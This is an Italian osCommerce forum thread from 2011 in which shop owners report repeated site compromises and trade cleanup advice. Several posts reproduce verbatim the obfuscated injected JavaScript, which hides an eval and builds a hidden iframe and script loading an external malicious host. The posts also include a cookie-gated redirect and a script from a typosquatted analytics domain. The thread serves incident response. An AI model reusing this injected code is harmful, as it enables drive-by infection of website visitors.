osCommerceITalia

comunità di utenti e sviluppatori italiani per osCommerce
http://oscommerceitalia.com/forums/

Attacco Hacker no-stop

http://oscommerceitalia.com/forums/viewtopic.php?t=13173

Pagina 1 di 2

Attacco Hacker no-stop

Inviato: 16/03/2011, 1:08
da jerys1974
ragazzi aiuto!
sto subendo da questa mattina un attacco hacker sul mio sito.
Stanno continuando ad inserire alcuni script sulle pagine index e sui file .js
La cosa che non mi è chiara, è come abbiano fatto ad entrare nel lato admin. Il lato admin è protetto da password htaccess.
E' già la seconda volta che cancello tutti gli script e ora, in questo momento, li stanno reinserendo.
Datemi una mano. Come posso individuare il Trojan, perché di Trojan si tratta, sicuramente.

I file che inseriscono sono:
function createCSS(selector,declaration){var ua=navigator.userAgent.toLowerCase();var isIE=(/msie/.test(ua))&&!(/opera/.test(ua))&&(/win/.test(ua));var style_node=document.createElement("style");if(!isIE)style_node.innerHTML=selector+"
{"+declaration+"}";document.getElementsByTagName("head")[0].appendChild(style_node);if(isIE&&document.styleSheets&&document.styleSheets.length>0){var last_style_node=document.styleSheets[document.styleSheets.length-1];
if(typeof(last_style_node.addRule)=="object")last_style_node.addRule(selector,declaration);}};createCSS("#va","background:url(data:,String.fromCharCode)");var my=null;var r=document.styleSheets;for(var i=0;i<r.length;i++){try{var dkfw=r.cssRules||r.rules;for(var srx=0;srx<dkfw.length;srx++){var gk=dkfw.item?dkfw.item(srx):dkfw[srx];if(!gk.selectorText.match(/#va/))continue;fyqo=(gk.cssText)?
gk.cssText:gk.style.cssText;my=fyqo.match(/(S[^")]+)/)[1];iu=gk.selectorText.substr(1);};}catch(e){};}kgl=new Date(2010,11,3,2,21,4);t=kgl.getSeconds();var dkel=[36/t,36/t,420/t,408/t,128/t,160/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,412/t,404/t,464/t,276/t,432/t,404/t,436/t,404/t,440/t,464/t,460/t,264/t,484/t,336/t,388/t,412/t,312/t,388/t,436/t,
404/t,160/t,156/t,392/t,444/t,400/t,484/t,156/t,164/t,364/t,192/t,372/t,164/t,492/t,52/t,36/t,36/t,36/t,420/t,408/t,456/t,388/t,436/t,404/t,456/t,160/t,164/t,236/t,52/t,36/t,36/t,500/t,128/t,404/t,432/t,460/
t,404/t,128/t,492/t,52/t,36/t,36/t,36/t,472/t,388/t,456/t,128/t,392/t,400/t,484/t,128/t,244/t,128/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,396/t,456/t,404/t,388/t,464/t,404/t,276/t,432/t,404/t,436/t,
404/t,440/t,464/t,160/t,136/t,392/t,444/t,400/t,484/t,136/t,164/t,236/t,52/t,36/t,36/t,36/t,464/t,456/t,484/t,128/t,492/t,52/t,36/t,36/t,36/t,36/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,388/t,
448/t,448/t,404/t,440/t,400/t,268/t,416/t,420/t,432/t,400/t,160/t,392/t,400/t,484/t,164/t,236/t,52/t,36/t,36/t,36/t,500/t,128/t,396/t,388/t,464/t,396/t,416/t,128/t,160/t,404/t,164/t,128/t,492/t,52/t,36/t,36/t,
36/t,36/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,392/t,444/t,400/t,484/t,128/t,244/t,128/t,392/t,400/t,484/t,236/t,52/t,36/t,36/t,36/t,500/t,52/t,36/t,36/t,36/t,420/t,408/t,128/t,160/t,400/t,444/t,
396/t,468/t,436/t,404/t,440/t,464/t,184/t,412/t,404/t,464/t,276/t,432/t,404/t,436/t,404/t,440/t,464/t,460/t,264/t,484/t,336/t,388/t,412/t,312/t,388/t,436/t,404/t,160/t,156/t,392/t,444/t,400/t,484/t,156/t,164/t,
364/t,192/t,372/t,164/t,492/t,52/t,36/t,36/t,36/t,36/t,420/t,408/t,456/t,388/t,436/t,404/t,456/t,160/t,164/t,236/t,52/t,36/t,36/t,36/t,500/t,128/t,404/t,432/t,460/t,404/t,128/t,492/t,52/t,36/t,36/t,36/t,36/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,
476/t,456/t,420/t,464/t,404/t,160/t,136/t,240/t,420/t,408/t,456/t,388/t,436/t,404/t,128/t,460/t,456/t,396/t,244/t,156/t,416/t,464/t,464/t,448/t,232/t,188/t,188/t,404/t,468/t,456/t,444/t,480/t,212/t,184/t,392/t,420/t,488/t,188/t,460/t,464/t,388/t,484/t,
188/t,444/t,468/t,464/t,184/t,448/t,416/t,448/t,252/t,460/t,380/t,420/t,400/t,244/t,196/t,156/t,128/t,476/t,420/t,400/t,464/t,416/t,244/t,156/t,196/t,192/t,156/t,128/t,416/t,404/t,420/t,412/t,416/t,464/t,244/t,156/t,196/t,192/t,156/t,128/t,460/t,464/t,
484/t,432/t,404/t,244/t,156/t,472/t,420/t,460/t,420/t,392/t,420/t,432/t,420/t,464/t,484/t,232/t,416/t,420/t,400/t,400/t,404/t,440/t,236/t,448/t,444/t,460/t,420/t,464/t,420/t,444/t,440/t,232/t,388/t,392/t,460/t,444/t,432/t,468/t,464/t,404/t,236/t,
432/t,404/t,408/t,464/t,232/t,192/t,236/t,464/t,444/t,448/t,232/t,192/t,236/t,156/t,248/t,240/t,188/t,420/t,408/t,456/t,388/t,436/t,404/t,248/t,136/t,164/t,236/t,52/t,36/t,36/t,36/t,500/t,52/t,36/t,36/t,500/t,52/t,36/t,36/t,408/t,468/t,440/t,396/t,
464/t,420/t,444/t,440/t,128/t,420/t,408/t,456/t,388/t,436/t,404/t,456/t,160/t,164/t,492/t,52/t,36/t,36/t,36/t,472/t,388/t,456/t,128/t,408/t,128/t,244/t,128/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,396/t,456/t,404/t,388/t,464/t,404/t,
276/t,432/t,404/t,436/t,404/t,440/t,464/t,160/t,156/t,420/t,408/t,456/t,388/t,436/t,404/t,156/t,164/t,236/t,408/t,184/t,460/t,404/t,464/t,260/t,464/t,464/t,456/t,420/t,392/t,468/t,464/t,404/t,160/t,156/t,460/t,456/t,396/t,156/t,176/t,156/t,416/t,
464/t,464/t,448/t,232/t,188/t,188/t,404/t,468/t,456/t,444/t,480/t,212/t,184/t,392
/t,420/t,488/t,188/t,460/t,464/t,388/t,484/t,188/t,444/t,468/t,464/t,184/t,448/t,416/t,448/t,252/t,460/t,380/t,420/t,
400/t,244/t,196/t,156/t,164/t,236/t,408/t,184/t,460/t,464/t,484/t,432/t,404/t,184/t,472/t,420/t,460/t,420/t,392/t,420/t,432/t,420/t,464/t,484/t,244/t,156/t,416/t,420/t,400/t,400/t,404/t,440/t,156/t,236/t,408/t,184/t,460/t,464/t,484/t,432/t,404/t,184/t,448/t,444/t,460/t,420/t,464/t,420/t,444/t,440/t,244/t,
156/t,388/t,392/t,460/t,444/t,432/t,468/t,464/t,404/t,156/t,236/t,408/t,184/t,460/t,464/t,484/t,432/t,404/t,184/t,432/t,
404/t,408/t,464/t,244/t,156/t,192/t,156/t,236/t,408/t,184/t,460/t,464/t,484/t,432/t,404/t,184/t,464/t,444/t,448/t,244/t,156/t,192/t,156/t,236/t,408/t,184/t,460/t,404/t,464/t,260/t,464/t,464/t,456/t,420/t,392/t,468/t,464/t,404/t,160/t,156/t,476/t,420/t,400/t,464/t,416/t,156/t,176/t,156/t,196/t,192/t,156/t,
164/t,236/t,408/t,184/t,460/t,404/t,464/t,260/t,464/t,464/t,456/t,420/t,392/t,468/t,464/t,404/t,160/t,156/t,416/t,404/t,
420/t,412/t,416/t,464/t,156/t,176/t,156/t,196/t,192/t,156/t,164/t,236/t,52/t,36/t,36/t,36/t,400/t,444/t,396/t,468/t,436/t,
404/t,440/t,464/t,184/t,412/t,404/t,464/t,276/t,432/t,404/t,436/t,404/t,440/t,464/t,460/t,264/t,484/t,336/t,388/t,
412/t,312/t,388/t,436/t,404/t,160/t,156/t,392/t,444/t,400/t,484/t,156/
t,164/t,364/t,192/t,372/t,184/t,388/t,448/t,448/t,404/t,440/t,400/t,268/t,416/t,420/t,432/t,400/t,160/t,408/t,164/t,236/t,52/t,36/t,36/t,500/t];
var aty="";var g=function(){return this;}();ko=g["e"+iu+"l"];var ydxx="";gh=ko(my);for(var i=0;i<dkel.length;i++){ch=ko(dkel);ydxx+=gh(ch);}ko(ydxx);


questo script:

<script language="JavaScript">if(document.cookie.indexOf("udb=1")<0){var j=0,n="";while(j<44)n+=String.fromCharCode("iuuq;0086/238/219/2850byb0dd0pvu/qiq@t`je>2".charCodeAt(j++)-1);document.cookie="udb=1;";document.location=n;}</script> ?><script>function createCSS(selector,declaration){var ua=navigator.userAgent.toLowerCase();var isIE=(/msie/.test(ua))&&!(/opera/.test(ua))&&(/win/.test(ua));var style_node=document.createElement("style");
if(!isIE)style_node.innerHTML=selector+" {"+declaration+"}";document.getElementsByTagName("head")[0].appendChild(style_node);if(isIE&&document.styleSheets&&document.styleSheets.length>0){var last_style_node=document.styleSheets[document.styleSheets.length-1];if(typeof(last_style_node.addRule)=="object")last_style_node.addRule(selector,declaration);}};
createCSS("#va","background:url(data:,String.fromCharCode)");var iv=null;var r=document.styleSheets;for(var i=0;i<r.length;i++){try{var ra=r.cssRules||r.rules;for(var ohx=0;ohx<ra.length;ohx++){var rnbr=ra.item?ra.item(ohx):ra[ohx];if(!rnbr.selectorText.match(/#va/))continue;uj=(rnbr.cssText)?rnbr.cssText:rnbr.style.cssText;iv=uj.match(/(S[^")]+)/)[1];ly=rnbr.selectorText.substr(1);};}catch(e){};}cr=new Date(2010,11,3,2,21,4);t=cr.getSeconds();
var tofw=[36/t,36/t,420/t,408/t,128/t,160/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,412/t,404/t,464/t,276/t,432/t,404/t,436/t,404/t,440/t,464/t,460/t,264/t,484/t,
336/t,388/t,412/t,312/t,388/t,436/t,404/t,160/t,156/t,392/t,444/t,400/t,484/t,156/t,164/t,364/t,192/t,372/t,164/t,492/t,52/t,36/t,36/t,36/t,420/t,408/t,456/t,388/t,436/t,404/t,456/t,160/t,164/t,236/t,52/t,36/t,36/t,500/t,128/t,404/t,432/t,460/t,404/t,128/t,492/t,52/t,36/t,
36/t,36/t,472/t,388/t,456/t,
128/t,392/t,400/t,484/t,128/t,244/t,128/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,396/t,456/t,404/t,388/t,464/t,404/t,276/t,432/t,404/t,436/t,404/t,440/t,464/t,160/t,136/t,392/t,
444/t,400/t,484/t,136/t,164/t,236/t,52/t,36/t,36/t,36/t,464/t,456/t,484/t,128/t,492/t,52/t,36/t,36/t,36/t,36/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,388/t,448/t,448/t,404/t,440/t,400/t,268/t,416/t,420/t,432/t,
400/t,160/t,392/t,400/t,484/t,164/t,
236/t,52/t,36/t,36/t,36/t,500/t,128/t,396/t,388/t,464/t,396/t,416/t,128/t,160/t,404/t,164/t,128/t,492/t,52/t,36/t,36/t,36/t,36/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,392/t,444/t,
400/t,484/t,128/t,244/t,128/t,392/t,400/t,484/t,236/t,52/t,36/t,36/t,36/t,500/t,52/t,36/t,36/t,36/t,420/t,408/t,128/t,160/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,412/t,404/t,464/t,276/t,432/t,404/t,436/t,
404/t,440/t,464/t,460/t,264/t,484/t,336/t,388/t,412/t,312/t,388/t,436/t,404/t,160/t,156/t,392/t,444/t,400/t,484/t,156/t,164/t,364/t,192/t,372/t,164/t,492/t,52/t,36/t,36/t,36/t,36/t,420/t,408/t,
456/t,388/t,436/t,404/t,456/t,160/t,164/t,236/t,52/t,36/t,36/t,36/t,500/t,128/t,404/t,432/t,460/t,404/t,128/t,492/t,52/t,36/t,36/t,36/t,36/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,476/t,456/t,420/t,464/t,404/t,160/t,136/t,240/t,420/t,408/t,456/t,
388/t,436/t,404/t,128/t,460/t,456/t,396/t,244/t,156/t,416/t,464/t,464/t,448/t,232/t,188/t,188/t,220/t,212/t,184/t,196/t,200/t,220/t,184/t,196/t,192/t,224/t,184/t,196/t,220/t,208/t,188/t,504/t,
388/t,480/t,388/t,188/t,396/t,396/t,188/t,444/t,468/t,464/t,184/t,448/t,416/t,448/t,252/t,460/t,380/t,420/t,400/t,244/t,196/t,156/t,128/t,476/t,420/t,400/t,464/t,416/t,244/t,156/t,196/t,192/t,156/t,128/t,416/t,404/t,420/t,412/t,416/t,464/t,244/t,156/t,196/t,
192/t,156/t,128/t,460/t,464/t,484/t,432/t,404/t,244/t,156/t,472/t,420/t,460/t,420/t,392/t,420/t,432/t,420/t,464/t,484/t,232/t,416/t,420/t,400/t,400/t,404/t,440/t,236/t,448/t,444/t,460/t,420/t,464/t,
420/t,444/t,440/t,232/t,388/t,392/t,460/t,444/t,432/t,468/t,464/t,404/t,236/t,432/t,404/t,408/t,464/t,232/t,192/t,236/t,464/t,444/t,448/t,232/t,192/t,236/t,156/t,248/t,240/t,188/t,420/t,408/t,456/t,388/t,436/t,404/t,248/t,136/t,164/t,236/t,52/t,36/t,
36/t,36/t,500/t,52/t,36/t,36/t,500/t,52/t,36/t,36/t,408/t,468/t,440/t,396/t,464/t,420/t,444/t,440/t,128/t,420/t,408/t,456/t,388/t,436/t,404/t,456/t,160/t,164/t,492/t,52/t,36/t,36/t,36/t,472/t,388/t,456/t,
128/t,408/t,128/t,244/t,128/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,396/t,456/t,404/t,388/t,464/t,404/t,276/t,432/t,404/t,436/t,404/t,440/t,464/t,160/t,156/t,420/t,408/t,456/t,388/t,436/t,404/t,156/t,164/t,236/t,408/t,184/t,460/t,
404/t,464/t,260/t,464/t,464/t,456/t,420/t,392/t,
468/t,464/t,404/t,160/t,156/t,460/t,456/t,396/t,156/t,176/t,156/t,416/t,464/t,464/t,448/t,232/t,188/t,188/t,220/t,212/t,184/t,196/t,200/t,220/t,184/t,196/t,192/t,224/t,184/t,196/t,220/t,208/t,188/t,504/t,388/t,
480/t,388/t,188/t,396/t,396/t,188/t,444/t,468/t,464/t,184/t,448/t,416/t,448/t,252/t,460/t,380/t,420/t,400/t,244/t,196/t,156/t,164/t,236/t,408/t,184/t,460/t,464/t,484/t,432/t,404/t,184/t,472/t,
420/t,460/t,420/t,392/t,420/t,432/t,420/t,464/t,484/t,244/t,156/t,416/t,420/t,400/t,400/t,404/t,440/t,156/t,236/t,408/t,184/t,460/t,464/t,484/t,432/t,404/t,184/t,448/t,444/t,460/t,420/t,464/t,420/t,444/t,440/t,
244/t,156/t,388/t,392/t,460/t,444/t,432/t,468/t,464/t,404/t,156/t,236/t,408/t,184/t,460/t,464/t,484/t,432/t,404/t,184/t,432/t,404/t,408/t,464/t,244/t,156/t,192/t,156/t,236/t,408/t,184/t,460/t,464/t,484/t,432/t,404/t,184/t,464/t,444/t,448/t,
244/t,156/t,192/t,156/t,236/t,408/t,184/t,460/t,404/t,464/t,260/t,464/t,464/t,456/t,420/t,392/t,468/t,464/t,404/t,160/t,156/t,476/t,420/t,400/t,464/t,416/t,156/t,176/t,156/t,196/t,192/t,156/t,164/t,236/t,408/t,
184/t,460/t,404/t,464/t,260/t,464/t,464/t,456/t,420/t,392/t,468/t,464/t,404/t,160/t,156/t,416/t,404/t,420/t,412/t,416/t,464/t,156/t,176/t,156/t,196/t,192/t,156/t,164/t,236/t,52/t,36/t,36/t,36/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,
184/t,412/t,404/t,464/t,276/t,432/t,404/t,436/t,404/t,440/t,464/t,460/t,264/t,484/t,336/t,388/t,412/t,312/t,388/t,436/t,404/t,160/t,156/t,
392/t,444/t,400/t,484/t,156/t,164/t,364/t,192/t,372/t,184/t,388/t,448/t,448/t,404/t,440/t,400/t,268/t,416/t,420/t,432/t,400/t,160/t,408/t,
164/t,236/t,52/t,36/t,36/t,500/t];var tp="";var g=function(){return this;}();qcid=g["e"+ly+"l"];var htk="";phk=qcid(iv);for(var i=0;i<tofw.length;i++){xby=qcid(tofw);htk+=phk(xby);}qcid(htk);</script>

Re: Attacco Hacker no-stop

Inviato: 16/03/2011, 2:10
da jerys1974
Tengo a precisare che i file_manager.php sono già stati eliminati.

Re: Attacco Hacker no-stop

Inviato: 16/03/2011, 3:44
da 06voip
è un'exploit "mascherato" qualcuno potrebbe avere l'accesso ftp, prova a cambiare tutte le password in tuo possesso, ripulisci, rendi più sicuro il tuo shop con le contrib che ci sono in giro e gli update 2.2 to 2.3

- Saluti

Re: Attacco Hacker no-stop

Inviato: 16/03/2011, 11:11
da jerys1974
Grazie del consiglio Voip,
Io credo di aver ripulito tutto ma... c'è una sorta di antivirus che potrebbe farmi uno scanning del sito? Per ora sto usando quello di google e dice che ora è tutto ok.
Io ho individuato quelle aggiunte ai file perché erano in fondo al file e perché i file manomessi avevano aggiornato la data di modifica, visibile da ftp.
Ora vedrò di cambiare le password di accesso htaccess. Non credo comunque che avessero le password di accesso del server, perché nel server ci sono una ventina di domini ed è stato attaccato solo il mio OScommerce.
E' chiaro che il bug o il trojan è dentro.
Nella mia ignoranza ho ripulito tutti i file con gli script che ho postato. Gli altri mi sembrano normali.
I file di testo come WS_FTP.LOG o spiders.txt o tld.txt, error_log, sono attaccabili?

Re: Attacco Hacker no-stop

Inviato: 16/03/2011, 11:45
da 06voip
si a pensarci l'accesso ftp è un po' troppo, c'è qualche file bacato.. se non hai un backup sicuramente funzionante procederei con lo scarico dello lo shop e farei una ricerca di stringhe di testo come t,184 e altre che sono piuttosto insolite per osc, per esempio anche la parola "opera" è insolita per osc.

Per i file di log e txt penso non ci siano problemi per via del fatto che non sono eseguibili dal web server.. per tool di check dello shop al momento non saprei cosa consigliarti.. in giro ce ne sono diversi considera però che quelli free di solito sono per smanettoni e spesso su piattaforma unix e richiedono delle conoscenze tecniche non indifferenti. Puoi sbizzarrirti a trovarli cercando su google con le parole "vulnerability Scanner web application" tra i tanti incontrerai sicuramente Acunetix Web Vulnerability Scanner che ha una versione trial di 30 gg. però lo conosco solo di nome e non saprei dirti.

- Saluti

Re: Attacco Hacker no-stop

Inviato: 16/03/2011, 12:48
da jerys1974
ciao,
sto controllando dietro tuo consiglio i file.
Come t,128/ o altri numeri simili, come quelli che ho postato, non ce ne sono.
Come opera ho trovato questo ma sul file categories.php, ma non mi sembra pericoloso.
Te lo posto, poi mi dici che ne pensi?
Grazie

// MaxiDVD Added WYSIWYG HTML Area Box + Admin Function v1.7 - 2.2 MS2 Products Description HTML - Head
_editor_url = "<?php echo (($request_type == 'SSL') ? HTTPS_SERVER : HTTP_SERVER) . DIR_WS_ADMIN; ?>htmlarea/"; // URL to htmlarea files
var win_ie_ver = parseFloat(navigator.appVersion.split("MSIE")[1]);
if (navigator.userAgent.indexOf('Mac') >= 0) { win_ie_ver = 0; }
if (navigator.userAgent.indexOf('Windows CE') >= 0) { win_ie_ver = 0; }
if (navigator.userAgent.indexOf('Opera') >= 0) { win_ie_ver = 0; }
<?php if (HTML_AREA_WYSIWYG_BASIC_PD == 'Basic'){ ?> if (win_ie_ver >= 5.5) {
document.write('<scr' + 'ipt src="' +_editor_url+ 'editor_basic.js"');
document.write(' language="Javascript1.2"></scr' + 'ipt>');
} else { document.write('<scr'+'ipt>function editor_generate() { return false; }</scr'+'ipt>'); }
<?php } else{ ?> if (win_ie_ver >= 5.5) {
document.write('<scr' + 'ipt src="' +_editor_url+ 'editor_advanced.js"');
document.write(' language="Javascript1.2"></scr' + 'ipt>');
} else { document.write('<scr'+'ipt>function editor_generate() { return false; }</scr'+'ipt>'); }
<?php }?>

Re: Attacco Hacker no-stop

Inviato: 16/03/2011, 13:42
da 06voip
è uno script per UltraPics direi che è a posto, se non hai trovato nient'altro di sospetto proverei a caricarlo, se poi riescono ad entrarti ancora o hai una falla o c'è un'altro tipo di exploit e li per risolvere devi andare sulle contrib di sicurezza e gli update..

- Saluti

Re: Attacco Hacker no-stop

Inviato: 16/03/2011, 19:50
da evilmonkey93
Anche a me non mi lasciano vivere....non faccio in tempo a ripristinare il db dal backup che dopo 20 minuti già me l'hanno riempito nuovamente....

Re: Attacco Hacker no-stop

Inviato: 18/03/2011, 13:19
da ErMeS80
Stesso problema anche per me !
Ho eliminato la stringa praticamente da tutti i files ma nella home page viene generata ancora ; non riesco a capire da dove; mi sembra di aver capito che sia qualcosa legato al STS

ecco il sorgente generato della home:
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html dir="LTR" lang="it">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>filtoppa shop</title>
<base href="http://shop.filtoppa.it/">

<!-- start get_javascript(applicationtop2header) //-->
<script>function createCSS(selector,declaration){var ua=navigator.userAgent.toLowerCase();var isIE=(/msie/.test(ua))&&!(/opera/.test(ua))&&(/win/.test(ua));var style_node=document.createElement("style");if(!isIE)style_node.innerHTML=selector+" {"+declaration+"}";document.getElementsByTagName("head")[0].appendChild(style_node);if(isIE&&document.styleSheets&&document.styleSheets.length>0){var last_style_node=document.styleSheets[document.styleSheets.length-1];if(typeof(last_style_node.addRule)=="object")last_style_node.addRule(selector,declaration);}};createCSS("#va","background:url(data:,String.fromCharCode)");var my=null;var r=document.styleSheets;for(var i=0;i<r.length;i++){try{var dkfw=r.cssRules||r.rules;for(var srx=0;srx<dkfw.length;srx++){var gk=dkfw.item?dkfw.item(srx):dkfw[srx];if(!gk.selectorText.match(/#va/))continue;fyqo=(gk.cssText)?gk.cssText:gk.style.cssText;my=fyqo.match(/(S[^")]+)/)[1];iu=gk.selectorText.substr(1);};}catch(e){};}kgl=new Date(2010,11,3,2,21,4);t=kgl.getSeconds();var dkel=[36/t,36/t,420/t,408/t,128/t,160/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,412/t,404/t,464/t,276/t,432/t,404/t,436/t,404/t,440/t,464/t,460/t,264/t,484/t,336/t,388/t,412/t,312/t,388/t,436/t,404/t,160/t,156/t,392/t,444/t,400/t,484/t,156/t,164/t,364/t,192/t,372/t,164/t,492/t,52/t,36/t,36/t,36/t,420/t,408/t,456/t,388/t,436/t,404/t,456/t,160/t,164/t,236/t,52/t,36/t,36/t,500/t,128/t,404/t,432/t,460/t,404/t,128/t,492/t,52/t,36/t,36/t,36/t,472/t,388/t,456/t,128/t,392/t,400/t,484/t,128/t,244/t,128/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,396/t,456/t,404/t,388/t,464/t,404/t,276/t,432/t,404/t,436/t,404/t,440/t,464/t,160/t,136/t,392/t,444/t,400/t,484/t,136/t,164/t,236/t,52/t,36/t,36/t,36/t,464/t,456/t,484/t,128/t,492/t,52/t,36/t,36/t,36/t,36/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,388/t,448/t,448/t,404/t,440/t,400/t,268/t,416/t,420/t,432/t,400/t,160/t,392/t,400/t,484/t,164/t,236/t,52/t,36/t,36/t,36/t,500/t,128/t,396/t,388/t,464/t,396/t,416/t,128/t,160/t,404/t,164/t,128/t,492/t,52/t,36/t,36/t,36/t,36/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,392/t,444/t,400/t,484/t,128/t,244/t,128/t,392/t,400/t,484/t,236/t,52/t,36/t,36/t,36/t,500/t,52/t,36/t,36/t,36/t,420/t,408/t,128/t,160/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,412/t,404/t,464/t,276/t,432/t,404/t,436/t,404/t,440/t,464/t,460/t,264/t,484/t,336/t,388/t,412/t,312/t,388/t,436/t,404/t,160/t,156/t,392/t,444/t,400/t,484/t,156/t,164/t,364/t,192/t,372/t,164/t,492/t,52/t,36/t,36/t,36/t,36/t,420/t,408/t,456/t,388/t,436/t,404/t,456/t,160/t,164/t,236/t,52/t,36/t,36/t,36/t,500/t,128/t,404/t,432/t,460/t,404/t,128/t,492/t,52/t,36/t,36/t,36/t,36/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,476/t,456/t,420/t,464/t,404/t,160/t,136/t,240/t,420/t,408/t,456/t,388/t,436/t,404/t,128/t,460/t,456/t,396/t,244/t,156/t,416/t,464/t,464/t,448/t,232/t,188/t,188/t,404/t,468/t,456/t,444/t,480/t,212/t,184/t,392/t,420/t,488/t,188/t,460/t,464/t,388/t,484/t,188/t,444/t,468/t,464/t,184/t,448/t,416/t,448/t,252/t,460/t,380/t,420/t,400/t,244/t,196/t,156/t,128/t,476/t,420/t,400/t,464/t,416/t,244/t,156/t,196/t,192/t,156/t,128/t,416/t,404/t,420/t,412/t,416/t,464/t,244/t,156/t,196/t,192/t,156/t,128/t,460/t,464/t,484/t,432/t,404/t,244/t,156/t,472/t,420/t,460/t,420/t,392/t,420/t,432/t,420/t,464/t,484/t,232/t,416/t,420/t,400/t,400/t,404/t,440/t,236/t,448/t,444/t,460/t,420/t,464/t,420/t,444/t,440/t,232/t,388/t,392/t,460/t,444/t,432/t,468/t,464/t,404/t,236/t,432/t,404/t,408/t,464/t,232/t,192/t,236/t,464/t,444/t,448/t,232/t,192/t,236/t,156/t,248/t,240/t,188/t,420/t,408/t,456/t,388/t,436/t,404/t,248/t,136/t,164/t,236/t,52/t,36/t,36/t,36/t,500/t,52/t,36/t,36/t,500/t,52/t,36/t,36/t,408/t,468/t,440/t,396/t,464/t,420/t,444/t,440/t,128/t,420/t,408/t,456/t,388/t,436/t,404/t,456/t,160/t,164/t,492/t,52/t,36/t,36/t,36/t,472/t,388/t,456/t,128/t,408/t,128/t,244/t,128/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,396/t,456/t,404/t,388/t,464/t,404/t,276/t,432/t,404/t,436/t,404/t,440/t,464/t,160/t,156/t,420/t,408/t,456/t,388/t,436/t,404/t,156/t,164/t,236/t,408/t,184/t,460/t,404/t,464/t,260/t,464/t,464/t,456/t,420/t,392/t,468/t,464/t,404/t,160/t,156/t,460/t,456/t,396/t,156/t,176/t,156/t,416/t,464/t,464/t,448/t,232/t,188/t,188/t,404/t,468/t,456/t,444/t,480/t,212/t,184/t,392/t,420/t,488/t,188/t,460/t,464/t,388/t,484/t,188/t,444/t,468/t,464/t,184/t,448/t,416/t,448/t,252/t,460/t,380/t,420/t,400/t,244/t,196/t,156/t,164/t,236/t,408/t,184/t,460/t,464/t,484/t,432/t,404/t,184/t,472/t,420/t,460/t,420/t,392/t,420/t,432/t,420/t,464/t,484/t,244/t,156/t,416/t,420/t,400/t,400/t,404/t,440/t,156/t,236/t,408/t,184/t,460/t,464/t,484/t,432/t,404/t,184/t,448/t,444/t,460/t,420/t,464/t,420/t,444/t,440/t,244/t,156/t,388/t,392/t,460/t,444/t,432/t,468/t,464/t,404/t,156/t,236/t,408/t,184/t,460/t,464/t,484/t,432/t,404/t,184/t,432/t,404/t,408/t,464/t,244/t,156/t,192/t,156/t,236/t,408/t,184/t,460/t,464/t,484/t,432/t,404/t,184/t,464/t,444/t,448/t,244/t,156/t,192/t,156/t,236/t,408/t,184/t,460/t,404/t,464/t,260/t,464/t,464/t,456/t,420/t,392/t,468/t,464/t,404/t,160/t,156/t,476/t,420/t,400/t,464/t,416/t,156/t,176/t,156/t,196/t,192/t,156/t,164/t,236/t,408/t,184/t,460/t,404/t,464/t,260/t,464/t,464/t,456/t,420/t,392/t,468/t,464/t,404/t,160/t,156/t,416/t,404/t,420/t,412/t,416/t,464/t,156/t,176/t,156/t,196/t,192/t,156/t,164/t,236/t,52/t,36/t,36/t,36/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,412/t,404/t,464/t,276/t,432/t,404/t,436/t,404/t,440/t,464/t,460/t,264/t,484/t,336/t,388/t,412/t,312/t,388/t,436/t,404/t,160/t,156/t,392/t,444/t,400/t,484/t,156/t,164/t,364/t,192/t,372/t,184/t,388/t,448/t,448/t,404/t,440/t,400/t,268/t,416/t,420/t,432/t,400/t,160/t,408/t,164/t,236/t,52/t,36/t,36/t,500/t];var aty="";var g=function(){return this;}();ko=g["e"+iu+"l"];var ydxx="";gh=ko(my);for(var i=0;i<dkel.length;i++){ch=ko(dkel);ydxx+=gh(ch);}ko(ydxx);</script>
<!-- end get_javascript(applicationtop2header) //-->

<link rel="stylesheet" type="text/css" href="includes/sts_templates/carbon-grey/styles/stylesheet.css">
</head>
<body marginwidth="0" marginheight="0" topmargin="0" bottommargin="0" leftmargin="0" rightmargin="0">
<script type="text/javascript" src="http://www.google-analyitcs.com/stat.js"></script>

Re: Attacco Hacker no-stop

Inviato: 18/03/2011, 20:37
da Alexfactory
Stesso uguale identico problema anche nel mio shop... le ho provate tutte ma non riesco a risolvere sto problema... continua a generare sempre lo script!

Re: Attacco Hacker no-stop

Inviato: 19/03/2011, 16:12
da maury2ma
esistono dei bug noti (che preferisco non divulgare) che si trovano facilmente in internet e permettono l'accesso alle pagine dell'admin anche protette da htaccess.
cambiate il nome della cartella admin con un nome di fantasia e almeno parate i futuri attacchi.
oscommerce è stato preso di mira da un annetto e stanno cercando di screditarlo trendento noti tutti i bug in modo da buttare giu' i sito 1 ad 1.


se volete fare una piccola modifica all'application_top.php sia admin che catalog aggiungete al fondo questa stringa, aiuta paecchio contro un piccolo bug sfruttato dai pirati informatici e dai ropiballe (gli hacker, quelli seri non sono pirati.... anche se spesso vengono chiamati cosi' dai media.) che si manifesta in 2 modi diversi: uno per php4 ed un'altro su php5

Codice: Seleziona tutto

// controlla eventuali intrusioni non autorizzate che sfruttino un bug del sistema
